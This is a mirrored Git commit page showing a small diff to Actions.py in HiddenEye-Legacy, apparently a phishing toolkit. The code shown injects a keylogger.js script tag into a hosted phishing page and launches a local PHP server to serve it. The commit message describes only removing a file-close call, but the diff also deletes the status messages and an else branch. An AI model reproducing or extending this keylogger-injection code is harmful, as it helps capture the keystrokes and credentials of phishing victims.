mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Update Actions.py
file does not need closing when using with open @An0nUD4Y .
This commit is contained in:
parent
b4a27f8acf
commit
802748f3a5
|
@ -313,17 +313,6 @@ def addingkeylogger():
|
||||||
c = read_data.replace('</title>', '</title><script src="keylogger.js"></script>')
|
c = read_data.replace('</title>', '</title><script src="keylogger.js"></script>')
|
||||||
f = open('Server/www/index.html', 'w')
|
f = open('Server/www/index.html', 'w')
|
||||||
f.write(c)
|
f.write(c)
|
||||||
f.close()
|
|
||||||
|
|
||||||
print(_("\n\n{1}[{0}??{1}]{0} Keylogger Added {1}Successfully...\n").format(RED, DEFAULT))
|
|
||||||
sleep(7.5)
|
|
||||||
|
|
||||||
else:
|
|
||||||
pass
|
|
||||||
print(_("\n\n{1}[{0}!!{1}]{0} Keylogger {1}Not Added{0}... \n").format(RED, DEFAULT))
|
|
||||||
sleep(7.0)
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
def runServer():
|
def runServer():
|
||||||
system("cd Server/www/ && php -S 127.0.0.1:1111 > /dev/null 2>&1 &")
|
system("cd Server/www/ && php -S 127.0.0.1:1111 > /dev/null 2>&1 &")
|
||||||
|
|
Loading…
Reference in New Issue
Block a user